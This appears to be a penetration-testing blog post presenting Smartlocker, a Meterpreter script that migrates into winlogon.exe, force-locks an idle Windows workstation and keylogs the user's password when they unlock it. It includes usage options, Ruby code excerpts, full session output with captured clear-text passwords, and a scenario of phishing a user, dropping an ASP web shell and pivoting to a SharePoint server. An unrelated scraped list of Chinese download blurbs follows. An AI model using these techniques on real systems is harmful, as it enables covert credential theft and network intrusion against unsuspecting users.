Oftentimes during a penetration test engagement, a bit of finesse goes a long way. One of the most effective ways to capture the clear-text user password from a compromised Windows machine is through the "keylogrecorder" Meterpreter script. This script can migrate into the winlogon.exe process, start capturing keystrokes, and then lock the user's desktop (the -k option). When the user enters their password to unlock their desktop, you now have their password. This, while funny and effective, can raise undue suspicion, especially when conducted across multiple systems at the same time. A smarter approach is to wait for a predetermined amount of idle time before locking the screen.
Enter Smartlocker. Smartlocker is a Meterpreter script written by CG and mubix that is similar to keylogrecorder (some code was even copied directly from it, thank you Carlos). But, unlike keylogrecorder, Smartlocker is designed to use a lighter touch when it comes to obtaining the user's password. Unlike keylogrecorder, Smartlocker is solely focused on obtaining passwords from winlogon.exe. Since winlogon only sees the keystrokes that happen when a login occurs, the resulting log file only contains the username and password. Perfect, right?
Smartlocker addressed three shortcomings with using keylogrecorder to capture login credentials.
1. If there are two winlogon processes on the machine, keylogrecorder will migrate into one, and then the other, many times rendering your meterpreter session dead or otherwise unusable. While this is a corner case, I have come across it during penetration tests, and its something that will be addressed in an upcoming fix to keylogrecorder. The other problem when there are two winlogon processes is that you can’t be sure which process you need to be in to be capture the active user's password.
2. The user is locked out instantly if the "-k" option is selected. While 80% of the target users may barely flinch at this, it will certainly stand out as odd behavior. This behavior will be even more suspicious if the user just opened an attachment or browsed to something they shouldn't have. That extra bit of "weirdness" may push them to make that help desk call...not good.
3. You have to jump through hoops to identify when the user has logged back in. One way to do this is through screen captures, but this is a manual and time intensive process. Idle time is also an imperfect marker as a user might have pushed the mouse by accident.
Smartlocker does it’s best to solve these issues.
Fade to cube farm...John Doe is a graphic designer for ACME Co. He just clicked your link and was kind enough to give you a reverse Meterpreter session. You’ve looked around John’s system and found nothing of interest except for learning that John is a SharePoint admin on the local MS SharePoint server. SMB isn’t working, so you decide to go after SharePoint itself and you need John’s actual password for this task. But John is smart (or thought he was before he still clicked your link), his password is 25 characters, making it difficult to crack from dumping the MS Cache hash value.
Smartlocker’s options:
Usage:
OPTIONS:
-b Heartbeat time between idle checks. Default is 30 seconds.
-h Help menu.
-i Idletime to wait before locking the screen automatically. Default 300 seconds (5 minutes).
-p Target PID - used when multiple Winlogon sessions are present.
-t Time interval in seconds between recollection of keystrokes, default 30 seconds.A quick check to see if John’s computer is set to lock out automatically:
meterpreter > getuid
Server username: ACME/johnd
meterpreter > reg queryval -k "HKCU//Control Panel//Desktop" -v ScreenSaverIsSecure
Key: HKCU/Control Panel/Desktop
Name: ScreenSaverIsSecure
Type: REG_SZ
Data: 0And it isn’t, so we’ll be going with Smartlocker’s default setting, which is a time based approach. The script checks to see if the target user account is an administrator and if so, finds all the winlogon processes running on John’s box. Since there is only one, Smartlocker automatically migrates to it and starts listening for keystrokes.
The following code polls the idle time of John’s box every $heartbeat seconds until the actual idle time reaches the $idletime threshold and then force-locks John’s box:
currentidle = session.ui.idle_time
print_status("System has currently been idle for #{currentidle} seconds")
while currentidle <= idletime do print_status("Current Idletime: #{currentidle} seconds")
sleep(heartbeat) currentidle = session.ui.idle_time end client.railgun.user32.LockWorkStation() This is where it basically just runs Carlos’ code and starts the keylogger, pulling the keystrokes out of memory every $heartbeat seconds. But, the cool part is, before it wraps back around to keep keylogging, it does a check to see if the user has logged back in. GetForegroundWindow is a Windows API call utilized through railgun which is process specific, and in winlogon’s case, it is only ever non-zero when the computer is locked or logged out. So a pretty simple IF statement stops the key logger automagically when it’s achieved its goal.
still_locked = client.railgun.user32.GetForegroundWindow()['return'] if still_locked == 0
print_status("They logged back in! Money time!") raise 'win' end sleep(keytime.to_i) end
rescue::Exception => e
if e.message != 'win'
print("/n")
print_status("#{e.class} #{e}")
end
print_status("Stopping keystroke sniffer...")
session.ui.keyscan_stopHere is the script in action on John’s box, you can even see where the idle time went back down to 12 when John moved his mouse:
meterpreter > run smartlocker
[*] Found WINLOGON at PID:644
[*] Migrating from PID:2532
[*] Migrated to WINLOGON PID: 644 successfully
[*] System has currently been idle for 12 seconds
[*] Current Idletime: 12 seconds
[*] Current Idletime: 42 seconds
[*] Current Idletime: 73 seconds
[*] Current Idletime: 12 seconds
[*] Current Idletime: 42 seconds
[*] Current Idletime: 72 seconds
[*] Current Idletime: 103 seconds
[*] Current Idletime: 133 seconds
[*] Current Idletime: 164 seconds
[*] Current Idletime: 194 seconds
[*] Current Idletime: 224 seconds
[*] Current Idletime: 255 seconds
[*] Current Idletime: 285 seconds
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /home/user/.msf3/logs/scripts/smartlocker/10.0.0.155_20101101.2157.txt
[*] Recording
[*] They logged back in! Money time!
[*] Stopping keystroke sniffer...
meterpreter > background
msf > cat /home/user/.msf3/logs/scripts/smartlocker/10.0.0.155_20101101.2157.txt
[*] exec: cat /home/user/.msf3/logs/scripts/smartlocker/10.0.0.155_20101101.2157.txt
design4life$uper12#07#76!Now, with John’s password we login to the SharePoint server, drop an ASP web shell, hook the local MS SQL database using the clear-text passwords found on the box and get a Meterpreter binary going on the SharePoint server [1].
[1] http://www.room362.com/blog/2010/5/7/0exploit-privilege-escalation.html
Now we run Smartlocker again and this time it identifies multiple instances of winlogon running, most likely because someone is using Remote Desktop to access this system. One thing to note, for the session ID for each winlogon instance, 0 is always the base console and any other number is some sort of remote login. Session ID is not something you’ll get from Meterpreter’s "ps" command so take note of which PID you are going to target.
Quick note: Any windows system that is configured to only allow one active ‘session’ such as XP, Vista and Windows 7 actually records the login keystrokes on Session 0 even though it creates a new winlogon instance, where as systems with terminal services, like 2k,2k3,2k8, the keystrokes are processed by each winlogon process respectively to their session.meterpreter > run smartlocker
[-] Multiple WINLOGON processes found, run manually and specify pid
[-] Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session
[*] Winlogon.exe - PID: 892 - Session: 0
[*] Winlogon.exe - PID: 415 - Session: 3Using the "-p" option with "415" as the PID of the winlogon instance we are targeting (since it’s a Windows 2008 server), we run Smartlocker again, and use the ‘-w’ option to simply wait for the user / admin to lock out their session instead of locking it for them.
meterpreter > run smartlocker -p 415 -w
[*] WINLOGON PID:415 specified. I'm trusting you..
[*] Migrating from PID:1788
[*] Migrated to WINLOGON PID: 415 successfully
[*] Waiting for user to lock their session out
[*] Session has been locked out
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /home/user/.msf3/logs/scripts/smartlocker/10.0.0.150_20101101.5433.txt
[*] Recording
[*] They logged back in! Money time!
[*] Stopping keystroke sniffer...
meterpreter > background
msf > cat /home/user/.msf3/logs/scripts/smartlocker/10.0.0.150_20101101.5433.txt
[*] exec: cat /home/user/.msf3/logs/scripts/smartlocker/10.0.0.150_20101101.5433.txt
M@sterD0mainAdm!n221
分享到:
相关推荐
利用混合拍卖捕获腐败多单位拍卖中的社会福利损失_Capturing Corruption with Hybrid Auctions Social Welfare Loss in Multi-Unit Auctions.pdf
非常好的取词程序,我查过了网上没有这样的程序,取词成功率达93%。在WIN2000稳定取词,在XP下跟explorer有冲突。可以取到网页,word,PDF目录,360界面。经测试,卡巴斯基等杀软件检测不到挂钩这种行为。
Lightweight Robot Arm for Capturing Large Space Debris.pdf
Capturing and modeling concerns with use cases Keeping concerns separate with use-case modules Modeling use-cases slices and aspects using the newest extensions to the UML notation Applying use cases ...
Defensive topics include cryptography, forensics, packet capturing, and building secure web applications. Offensive topics include brute force, port scanning, packet injection, web scraping, social ...
So if you are a game developer with an eye on capturing the gamer market then this book is the right solution for you. In this book, we will take you through a step by step journey which will teach ...
DeckLink Quad HDMI Recorder has improved EDID support for capturing from game consoles and DSLR cameras, along with improved support for DVI video modes and more reliable sensing of input connections...
capturing and deploying Microsoft Windows Deployment Services images; creating virtual machines; and installing server core. Then assess yourself using 300+ practice and review questions on the CD, ...
Capturing player input Creating 3D graphics with WebGL Textures and lighting Sound with HTML5 Audio And more… Table of Contents Part I: Getting Started with HTML5 Games Chapter 1: Gaming on the Web ...
Beginning HTML5 Games with CreateJS provides a hands-on approach to get you up and running with the most comprehensive tools available for ... you’ll learn to fully utilize the CreateJS suite to bring ...
视频采集端hdr优化
synchronous_capturing_and_sending.py
语言:English ... Grypp Corp的屏幕共享允许您在Grypp通话期间共享屏幕或特定的应用程序。 无论参与者使用什么浏览器,您都可以与所有参与者共享。 该服务是完全安全的,您始终可以控制共享的内容以及共享的时间。
Capturing Topology in Graph Pattern Matching
语言:English (UK) 该扩展是作为“用我自己的眼睛”应用程序的附带工具而部署的。...原始扩展名可以在https://chrome.google.com/webstore/detail/screen-capturing/ajhifddimkapgcifgcodmmfdlknahffk找到。
摘要音频:Capturing Humans in Motion: Temporal-Attentive 3D Human Pos
对于实时,高速,关键任务数据包捕获,而使用相对适中的台式机硬件,在高数据包速率期间不会遭受任何数据包丢失的情况。 应用程序在:实时网络或大型系统监视或集群系统中。
对论文《Intercepting Rogue Robots: An Algorithm for Capturing Multiple Evaders With Multiple Pursuers》的matlab复现,基于voronoi图最小化围捕算法
Fixed : Issue with mouse capturing in TTMSFMXTableView Fixed : Issue with alignment and resizing of detail view container when item has no detail view assigned in TTMSFMXTableview v1.6.0.0 New : ...